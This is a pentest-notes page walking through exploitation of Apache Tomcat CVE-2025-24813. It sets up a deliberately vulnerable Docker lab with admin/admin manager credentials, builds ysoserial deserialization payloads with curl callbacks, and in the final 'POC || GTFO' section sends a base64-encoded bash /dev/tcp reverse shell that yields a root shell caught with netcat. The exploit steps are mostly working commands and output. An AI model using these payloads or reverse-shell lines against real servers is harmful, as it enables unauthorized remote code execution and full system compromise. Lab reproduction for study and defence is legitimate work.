0xPThree.gitbook.io
  • Network Services
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 23 - Telnet
      • 25, 465, 587 - SMTP(S)
      • 53 - DNS
      • 80, 443 - HTTP(S)
        • Frameworks
          • Drupal
          • Flask
          • Laravel
          • Tomcat
          • Werkzeug
        • Fuzzing
        • Grafana
        • Languages
          • PHP
        • WebDAV
        • Web Vulnerabilities
          • CloudFlare Bypass
          • Command Injection
          • CSTI
          • File Inclusion/Path Traversal
          • SQL Injection
          • SSI
          • SSTI
          • Upload bypass
          • XLST
          • XML Injection
      • 88 - Kerberos
      • 135, 593 - MSRPC
      • 139, 445 - SMB
      • 161, 162, 10161, 10162 - SNMP
      • 1433, 3306 - SQL
      • 2049 - NFS
      • 2375 - Docker
  • Active Directory
    • ADCS
    • DACL Abuse
      • AddMember
      • ForceChangePassword
      • Kerberoasting
      • ReadLAPSPassword
      • ReadGMSAPassword
      • Grant Ownership
      • Grant Rights
      • Logon Script
      • Rights on RODC object
    • Security groups
    • Misc
  • Coding Languages
    • Python
  • Exploits / PoC's
    • Ansible
      • Ansible AWX
    • Apache
      • HTTP Server - CVE-2021-41773
      • Struts - CVE-2024-53677 / S2-067
      • Tomcat - CVE-2020-1938 / CVE-2020-10487
      • Tomcat - CVE-2025-24813
    • Confluence - CVE-2023-22527
    • CUPS - CVE-2024-47***
    • D-Link
      • CVE-2020-29322
      • Decrypt firmware: DIR-X1560
    • Dmidecode - CVE-2023-30630
    • Erlang
      • OTP SSH - CVE-2025-32433
    • EternalBlue - MS17-010
    • Gitlab - CVE-2023-7028
    • Ivanti - CVE-2024-21893 / 21887
    • Jenkins - CVE-2024-23897
    • LXD group - N/A
    • nf_tables - CVE-2024-1086
    • NFS - N/A
    • Oracle
      • WebLogic - CVE-2018-2628
      • WebLogic - CVE-2019-2729
      • WebLogic - CVE-2023-21839
      • WebLogic - CVE-2024-20931
      • WebLogic - CVE-2024-21006
    • PHP
      • CVE-2024-4577
    • RunC
      • CVE-2022-0811
      • CVE-2024-21626
    • Snap - CVE-2019-7304
    • TP-Link - CVE-2024-5035
  • Hardware
    • Firmware
    • JTAG
    • SPI
    • UART
    • USB
  • Post Exploit
    • Compile payload
    • Obfuscation
    • Read VMDK files
    • Saved Credentials
      • Linux - Ansible AWX / Tower
      • Linux - Dell Networker
      • Windows - Mozilla Firefox
      • Windows - Notepad++
      • Windows - WinSCP
    • Session Hijack
    • Sniffing Passwords
    • Upgrade shell
    • VMware
      • Disk Encryption
      • LDAP Connection (SSO)
      • Restore VCSA Postgres Database
      • vCenter Forge SAML
      • Waiter Account Information
  • Development
    • Dnsmasq DHCP
    • Docker
      • Ansible AWX
      • Docker Compose
      • FirmAE - Emulate Firmware
      • Oracle WebLogic
      • Rocket.Chat
      • Tomcat
      • Vaultwarden
    • Harden Windows Host
    • HTTPS Proxy
    • Netplan + Networkd
    • SSL/TLS Certificates
  • TODO
Powered by GitBook
On this page
  • Setup test environment
  • Verify vulnerability
  • Step 1: Uploading a Malicious Serialized Session
  • Step 2: Triggering Execution via Session Cookie
  • POC || GTFO

Was this helpful?

  1. Exploits / PoC's
  2. Apache

Tomcat - CVE-2025-24813

Last updated 2 months ago

Was this helpful?

CVE-2025-24813 is a potential RCE and/or information disclosure and/or information corruption with partial PUT.

An attacker could achieve remote code execution if all the following conditions are true -

  • Writes enabled for the default servlet (disabled by default)

  • Support for partial PUT (enabled by default)

  • Application was using Tomcat's file based session persistence with the default storage location

  • Application included a library that may be leveraged in a deserialization attack

The vulnerability affects both Windows and Linux based installation running any of the below Apache Tomcat versions:

  • 9.0.0.M1 <= Apache Tomcat <= 9.0.98

  • 10.1.0-M1 <= Apache Tomcat <= 10.1.34

  • 11.0.0-M1 <= Apache Tomcat <= 11.0.2

First available poc was published by targeting a Windows installation, below is the Linux equivalent.

Setup test environment

To setup a test docker container we need to tweak the a little to include common-collections-x.x.x.jar, as well as the non-default configuration in web.xml and context.xml.

<!-- web.xml (enable write for default servlet) -->
<init-param>
    <param-name>readonly</param-name>
    <param-value>false</param-value>
</init-param>

<!-- context.xml (file based session persistance with default storage location) -->
<Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore"/>
</Manager>

I decided to go with Tomcat version 11.0.1 in my test environment.

# Dockerfile
# Stage 1: Build stage to copy web apps and make modifications
FROM tomcat:11.0.1 as build

# Copy the necessary configuration files
COPY ./web.xml /usr/local/tomcat/conf/web.xml
COPY ./context.xml /usr/local/tomcat/conf/context.xml
COPY ./commons-collections-3.2.1.jar /usr/local/tomcat/lib/

# Copy web applications (ROOT and manager) from the `webapps.dist` folder inside the container
RUN mkdir -p /usr/local/tomcat/webapps/ROOT && \
    cp -r /usr/local/tomcat/webapps.dist/ROOT/* /usr/local/tomcat/webapps/ROOT && \
    cp -r /usr/local/tomcat/webapps.dist/manager /usr/local/tomcat/webapps/manager && \
    sed -i 's/allow="[^"]*"/allow=".*"/' /usr/local/tomcat/webapps/manager/META-INF/context.xml && \
    sed -i '/<\/tomcat-users>/d' /usr/local/tomcat/conf/tomcat-users.xml && \
    echo '  <role rolename="manager-gui"/>' >> /usr/local/tomcat/conf/tomcat-users.xml && \
    echo '  <role rolename="admin-gui"/>' >> /usr/local/tomcat/conf/tomcat-users.xml && \
    echo '  <user username="admin" password="admin" roles="manager-gui,admin-gui"/>' >> /usr/local/tomcat/conf/tomcat-users.xml && \
    echo '</tomcat-users>' >> /usr/local/tomcat/conf/tomcat-users.xml

# Stage 2: Final image to run Tomcat
FROM tomcat:11.0.1

# Copy from the build stage
COPY --from=build /usr/local/tomcat/webapps /usr/local/tomcat/webapps
COPY --from=build /usr/local/tomcat/conf /usr/local/tomcat/conf
COPY --from=build /usr/local/tomcat/lib /usr/local/tomcat/lib

# Expose the necessary port
EXPOSE 8080

# Start Tomcat in the foreground
CMD ["catalina.sh", "run"]
$ docker build -t tomcat1101 .
$ docker run -d -p 8888:8080 --name tomcat1101 tomcat1101

Verify vulnerability

Step 1: Uploading a Malicious Serialized Session

Create some random serialized data and upload it with PUT /anything/session. The payload is not important at this stage, we just want to verify that the target respond with HTTP 409.

kpen :: ~/tools » java -jar ysoserial-all.jar CommonsCollections7 whoami | base64 -w0
rO0ABXNyABNqYXZhLnV0a...

If we login to the docker container we can see that the new serialized session is created in the directory /usr/local/tomcat/work/Cataline/localhost/ROOT.

Step 2: Triggering Execution via Session Cookie

Once the session file is uploaded, the attacker triggers deserialization by sending a simple GET request with the JSESSIONID pointing to the malicious session.

Tomcat, seeing this session ID, retrieves the stored file, deserializes it, and executes the embedded Java code, granting full remote access to the attacker.

I've noticed during my testing that using CommonCollections6 (cc6) will result in a HTTP 500 response, while cc7 get HTTP 200 response. Both are valid and the payload is triggered as seen below, but I guess cc7 has the edge in terms of stealth.

kpen :: ~/tomcat » java --add-opens java.base/java.util=ALL-UNNAMED -jar ../tools/ysoserial-all.jar CommonsCollections6 'curl http://172.17.0.1:4444/cc6' | base64 -w0 > cc6.ser
kpen :: ~/tomcat » java --add-opens java.base/java.util=ALL-UNNAMED -jar ../tools/ysoserial-all.jar CommonsCollections7 'curl http://172.17.0.1:4444/cc7' | base64 -w0 > cc7.ser

kpen :: ~/tomcat » python3 exp.py url.txt cc6.ser
kpen :: ~/tomcat » python3 exp.py url.txt cc7.ser

kpen :: ~/tomcat » python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
172.17.0.2 - - [19/Mar/2025 13:10:04] code 404, message File not found
172.17.0.2 - - [19/Mar/2025 13:10:04] "GET /cc6 HTTP/1.1" 404 -
172.17.0.2 - - [19/Mar/2025 13:10:19] code 404, message File not found
172.17.0.2 - - [19/Mar/2025 13:10:19] "GET /cc7 HTTP/1.1" 404 -

POC || GTFO

## build payload
kpen :: ~/tomcat » echo "bash -i >& /dev/tcp/172.17.0.1/4444 0>&1" | base64   
YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTcuMC4xLzQ0NDQgMD4mMQo=
kpen :: ~/tomcat » java --add-opens java.base/java.util=ALL-UNNAMED -jar ../tools/ysoserial-all.jar CommonsCollections6 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTcuMC4xLzQ0NDQgMD4mMQo=}|{base64,-d}|{bash,-i}' | base64 -w0 > payload.ser

## run exploit
kpen :: ~/tomcat » python3 exp.py

## capture revshell
kpen :: ~/tomcat » nc -lvnp 4444                                                   
listening on [any] 4444 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 59082
root@1ad748140a56:/usr/local/tomcat# id && hostname
uid=0(root) gid=0(root) groups=0(root)
1ad748140a56

iSee857
Dockerfile